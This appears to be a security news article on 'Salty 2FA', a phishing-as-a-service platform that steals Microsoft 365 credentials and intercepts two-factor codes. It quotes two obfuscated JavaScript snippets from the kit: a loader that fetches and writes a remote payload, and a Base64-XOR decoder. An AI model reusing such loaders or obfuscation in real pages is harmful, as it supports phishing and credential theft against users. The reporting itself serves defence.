HomeSecuritySalty 2FA: New PhaaS platform targets Microsoft 365 users

Salty 2FA: New PhaaS platform targets Microsoft 365 users

A new sophisticated Phishing-as-a-Service (PhaaS) platform dubbed “ Salty 2FA ” has emerged as a significant threat to Microsoft 365 users across industries in the US and Europe.

Salty 2FA phishing

The platform uses advanced obfuscation techniques and multi-stage attack chains, specifically designed to bypass authentication mechanisms two-factorwhile stealing corporate credentials.

The platform conducts carefully designed phishing campaigns and targets organizations in various sectors: finance, telecommunications, energy, supply chain, and education.

See also: Phishing: Noodlophile malware distribution with new “bait”

The malware used is distinguished by a unique domain infrastructure pattern that combines domains in “.com” zones with Russian “.ru” top-level domains. This combination creates a complex network of redirects and payload delivery mechanisms that help evade traditional detection systems.

Salty 2FA: How phishing attacks work

Victims receive phishing emails containing various baits, including fake voicemails, requests for access to documents, etc., which redirect them to seemingly legitimate Microsoft login pages.

Salty 2FA: New PhaaS platform targets Microsoft 365 users

ANY.RUN analysts discovered this unknown PhaaS platform while searching for phishing campaigns. They discovered multiple sandbox sessions, which exhibited similar behavioral patterns despite using different domains and obfuscation techniques. Consistent use of Cloudflare Turnstile in conjunction with domain pairing (mentioned above) initially flagged these campaigns as potentially related, leading to extensive analysis that revealed the full capabilities of Salty 2FA.

The phishing platform can intercept and process multiple two-factor authentication methods, including push notifications, SMS codes, voice calls , and authenticator apps. This capability extends the attack beyond simply stealing credentials, allowing malicious users to maintain continued access to compromised accounts even when traditional 2FA protections are in place.

See also: British student convicted of selling phishing kits

Salty 2FA: Multi-Stage Execution Chain and Obfuscation Techniques

The technical architecture of Salty 2FA is based on a carefully orchestrated five-stage execution process, designed to resist analysis and detection:

  • The process begins with an obfuscated JavaScript function that acts as an entry point, containing various comments to complicate static analysis.
async function vitals() { function whiz (math) { return [...atob (math)].map((lewd, matchmaking, recklessness) => recklessness[0] ? String.fromCharCode((lewd.charCodeAt(0)- recklessness[0].charCodeAt(0)+256)%256):"").join(""); } if(sessionStorage[0]){ document.write(whiz(sessionStorage[0])); return? } unearned = await(await fetch(await whiz(`1PwICAQHzsPDAfUG//kIBAD19/nGyPn9wgYJw8M=`))).text(); document.write(await whiz(unearned)); sessionStorage[0] = unearned; }
  • The platform uses sophisticated element ID encoding using Base64 and XOR operations with a fixed generated value, making dynamic analysis significantly more difficult.
  • The front-end logic is based on jQuery calls to dynamically generated element identifiers, which must be decoded through a special process before manipulation.
function decode(s) { try { var r = ''; r = atob(s); var d = ''; for (var i = 0; i < r.length; i++) { d += String.fromCharCode(r.charCodeAt(i) ^ 'b03e37d4502862adc85953d8ea0c4b6a').charCodeAt(i % 'b03e37d4502862adc85953d8ea0c4b6a'.length)); } return d; } catch (e) { return s; } }
  • The platform integrates multiple anti-analysis mechanisms, including blocking keyboard shortcuts for debugging tools and execution time measurement for detecting controlled environments.
  • extraction uses the same XOR technique with session-derived keys, while the stolen credentials are transmitted to servers hosted in Russia via encoded POST requests containing both the encrypted data and the decryption parameters.

See also: Google Gemini: How email summaries lead to phishing attacks?

The emergence of Salty 2FA confirms that traditional defenses, such as multi-factor authentication (MFA/2FA), are no longer an “impenetrable wall” for cybercriminals. On the contrary, PhaaS platforms, leveraging automated tools and complex obfuscation methods, manage to perfectly mimic victims’ environments and steal not only passwords, but also second layers of identification.

This is particularly concerning for enterprise environments where Microsoft 365 is a key productivity tool. A successful breach could lead to sensitive data leaks, high-level email compromise, and even supply chain attacks if the attacker gains access to collaborating organizations.

See also: Hackers exploit link-wrapping services to steal Microsoft 365 login credentials

Selecting the team

🔑 Secure your passwords with Proton Pass

Password manager from Proton — end-to-end encryption, passkeys, built-in 2FA, and monitoring for leaks of your credentials.

  • ✔ Encrypted storage of passwords & passkeys
  • ✔ Notification if any of your passwords are leaked (Dark Web Monitoring)
  • ✔ Free version — on all devices
Get your free Proton Pass →

The link is an affiliate link — SecNews may receive a commission at no additional cost to you. It does not affect the independence of our article writing.

Salty 2FA: New PhaaS platform targets Microsoft 365 users

Indicative of the “industrialization” of cybercrime is the availability of Salty 2FA as a service. This means that even cybercriminals without specialized technical knowledge can rent or buy access to the platform and conduct professional-quality phishing campaigns. The existence of anti-analysis and advanced encoding stages shows that we are not talking about a simple script, but about an entire malicious infrastructure designed for long-term survival.

To address such attacks, organizations must move beyond traditional 2FA, adopting advanced passwordless authentication methods, as well as anomaly detection systems that focus on user behavior and not just the correctness of credentials.

📧
Subscribe to the SecNews Newsletter

The most important Security & Technology news in your Inbox.

Digital Fortress
Digital Fortresshttps://www.secnews.gr
Pursue Your Dreams & Live!

SEARCH

FOLLOW US

📧
Newsletter SecNews
The most important Security & Technology news in your inbox.

LIVE NEWS